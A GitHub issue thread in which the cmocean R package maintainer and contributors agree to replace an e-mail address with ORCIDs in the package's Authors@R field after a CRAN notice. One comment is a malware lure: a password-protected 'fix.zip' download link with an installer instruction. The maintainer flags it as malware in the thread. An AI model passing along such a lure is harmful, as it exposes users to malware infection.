### ISSUE TITLE
Updating Authors@R with e-mail addresses and ORCIDs

### ISSUE THREAD

**Issue by aitap** [aitap/cmocean#8]
Dear @japhir,

I've just got an e-mail from CRAN pointing out that your address as a contributor is not strictly valid, because we used <code> &lt;at&gt; </code> instead of `@` in #6. I can replace your e-mail with an ORCID, remove it altogether, or provide a valid email address (thus definitely opening it up to spammers<sup>1</sup>). Which one would you prefer? Since the CRAN message says

> Please correct before 2024-09-30 to safely retain your package on CRAN.

...I intend to <del>remove your e-mail address (but never your name)</del><ins>replace your e-mail address with your ORCID (since you already display it in your GitHub profile)</ins> around, say, 2024-09-20 unless you choose a different option.

<sup>1</sup> There are semi-regular 419 type scam messages arriving only to the e-mail addresses I have mentioned on CRAN. So it goes.

**Edit**: You may have received an e-mail from this issue with a link to some malware posted by someone else. I think that GitHub very quickly deleted the comment, and the file hosting blocked the link soon afterwards.

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aitap** [comment]
Speaking of `Authors@R`:

Dear @kthyng, @richardsc,

Would you like the CRAN package DOI [10.32614/CRAN.package.cmocean](https://doi.org/10.32614/CRAN.package.cmocean) to be attributed to your ORCID in addition to your name?

**Comment by richardsc** [comment]
Hi @aitap! Yes, that sounds good to me.

If you want to add my ORCID to the `DESCRIPTION` file, it is `ORCID="https://orcid.org/0000-0002-7833-206X"`, or I can make a PR to include it.

**Comment by kthyng** [comment]
Hi @aitap and @richardsc! Sure sounds good! My ORCID is "0000-0002-8746-614X".

**Comment by kthyng** [comment]
And thanks.

**Comment by japhir** [comment]
Hi @aitap, great, yeah removing my email address and replacing it with my ORCID sounds good! Thank you! :)

**Comment by aitap** [comment]
Thanks everyone!
